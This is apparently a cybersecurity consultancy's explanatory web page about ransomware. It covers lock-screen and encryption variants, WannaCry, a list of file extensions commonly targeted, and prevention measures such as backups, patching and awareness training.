What is Ransomware

Malicious programs that restrict or prevent access to data and systems are called ransomware. Ransomware typically requires the payment of “ransom” in exchange for access to data and systems. Ransomware cyber-attacks can therefore be considered a form of digital blackmail.
The ransomware threat has become more prevalent over the last couple of years, almost weekly new cases of ransomware incidents are being made public. Due to the possible loss of data, many companies are paying the ransom in an attempt to retrieve the encrypted data. Attackers have enhanced the malicious software and botnets can distribute ransomware easily.
Ransomware has been widely used for cyber-attacks as early as 2010. Even before that, first variants of the malicious programs existed. Simple ransomware variants for example show a lock screen to the user and prevent the usage of the system. Warning banners claim that the system is part of an active criminal investigation and is blocked until fines are paid.

Request a free quote

 Protect Your Business From Ransomware

Wannacry Overview
Wannacry Recovery
9 steps to take if hacked

To further enhance ransomware, new variants were developed which encrypt data and the decryption is impossible without the corresponding key. In addition to the data stored locally on the victim’s system, data stored on network drives or even in the cloud can be encrypted by ransomware.
From the criminals point of view, cyber-attacks using ransomware have the advantage of anonymous payments in form of Bitcoins or payment cards. For the victim, the difference between ransomware and more traditional methods such as banking trojans, DDoS tools or phishing is that the damage happens instantly. With ransomware, no bank will prevent or reimburse the damage nor will the system continue to work after removing the threat with an AntiVirus tool. Instead, files on the system such as pictures, documents and others are encrypted and no longer accessible and most of the time lost. Putting preventive measures in place, such as regular backups and frequent patches, may help to mitigate the threat of ransomware.
Most types of ransomware focus on conducting a denial of service to the user or organisation that is infected. By denying access to a users machine, or data, the attacker is effectively impacting the availability of the systems. This is a subtly different approach to many other types of attacks that focus on stealing information or changing information that resides in organisations systems. Many organisation have built Cyber Security Assurance programs that focus on protecting the confidentiality and integrity of systems, however fewer assurance programs have historically focused on the availability of systems, and in particular the availability of end user or client systems.

Common Types of Ransomware

There are lots of variants of Ransomware, however some of the more frequent types of ransomware include lock screen ransomware and encryption ransomware.  The Wannacry variant of Ransomware that hit in May 2017, was an Encryption Ransomware variant coupled to a worm, that was able to self propagate across a network infrastructure

What is Lock Screen Ransomware?

Ransomware, which blocks or prevents access to a system, anchors itself into the infected system so that the ransomware is loaded after each system boot. The desktop is covered with a picture or a website which informs the user about the ransomware and demands payment. Alleged proceedings for violations of copyright or the use of pornographic content are usually used to trick the user into paying a ransom. In order to make the demand seem more genuine, names and logos of well-known organisations are used and sometimes even pornographic content or a picture of the webcam that is connected to the infected system. The screens are adapted to the specific country depending on the geolocation of the IP address.

Figure 1 - Lock Screen Ransomware

The malicious programs use different methods to achieve persistence. The only possible interaction with the system is the payment of the ransom and unlocking the screen with the code. All other input and keyboard combinations are intercepted and ignored. Additionally, the malicious program constantly checks whether further processes are started with which the ransomware could be bypassed such as task manager, registry editor or the command prompt.

Since this form of ransomware only limits the usage of the operating system, recovery operations via USB stick or other means can be exhausted to restore the system without the loss of data.

The ransomware browlock has a similar function. The operating system is not actually infected in this case only a lock screen is displayed in full screen mode of the browser and all attempts to close it are blocked by JavaScript.

What is Encryption Ransomware?

Ransomware, which encrypts data, is far more complex than lock screen ransomware. Depending on the ransomware family, symmetric or asymmetric methods (or a combination of both) are used to encrypt the data. If the cryptographic function is correctly implemented, decryption is only possible with the corresponding key. In contrast to lock screen ransomware, the user can continue to use the operating system in case of an emergency.

The encryption usually happens in several stages:

  • Encryption of files using a symmetric encryption method such as AES
  • Encryption of symmetric keys using an asymmetric method such as RSA or elliptic curve-based methods (ECC)

As the next step, the ransomware searches local drives such as hard drives and USB sticks as well as network drives for user data such as documents, photos, videos and other data types which are potentially of great value to the user. Many ransomware variants include a list of file types to be encrypted.

.123 .3dm .3ds .3g2 .3gp .602 .7z .aes .arc .asc .asf .asm .asp .avi .bak .bat .bmp .brd .cgm .class .cmd .cpp .crt .cs .csr .csv .db .dbf .dch .dif .dip .djv .djvu .doc .docb .docm docx .dot .dotm .dotx .fla .flv .frm .gif .gpg .gz .hwp .ibd .jar .java .jpeg .jpg .js .key .lay .lay6 .ldf .m3u .m4u .max .mdb .mdf .mid .mkv .mml .mov .mp3 .mp4 .mpeg .mpg .ms11 .myd .myi .nef .odb .odg .odp .ods .odt .otg .otp .ots .ott .p12 .paq .pas .pdf .pem .php .pl .png .pot .potm .potx .ppam .pps .ppsm .ppsx .ppt .pptm .pptx .psd .qcow2 .rar .raw .rb .RTF .sch .sh .sldm .sldx .slk .sql .sqlite3 .Liedtitel .stc .std .sti .stw .svg .swf .sxc .sxd .sxi .sxm .sxw .tar .tar.bz2 .tbk .tgz .tif .tiff .txt .uop .uot .vb .vbs .vdi .vmdk .vmx .vob .wav .wb2 .wk1 .wks .wma .wmv .xlc .xlm .xls .xlsb .xlsm .xlsx .xlt .xltm .xltx .xlw .xml .zip

In addition, there may be files and folders which are excluded from encryption such as files that are necessary for the running of the operating system. The unencrypted files are overwritten with the encrypted ones and the unencrypted files are deleted. Subsequently, the user is informed about the encryption of the data. For this purpose, information texts are stored as text files, image files or set as the background of the system.

Figure 2 - WanaCrypt0r Lock Screen

Ransomware Incidents

Ransomware incidents clearly demonstrate the failure in prevention of such events. Poorly patched systems, old or non-existent backups, weak administrator passwords or missing network segmentation are only some examples that contribute to the installation and distribution of ransomware.

Additionally, employees play a key role in most ransomware incidents as some attacks are so sophisticated and thus very difficult to detect. Many of the ransomware spam e-mails are less sophisticated and in this case training employees in security awareness may help to reduce risk.

In many cases, signs for trojans or DDoS attacks are partially ignored and not actively pursued by companies. Similarly, misconfigurations of systems are often neglected as these have no effect on the operation. The damages in these cases are relatively low. However, the damage from ransomware can be severe and active prevention measures need to be implemented.

Is Your Cyber Security Strategy Up to Par?

Speak with our consultants to rest assured that you are protected from the most recent threats companies like yours are experiencing..

Contact Us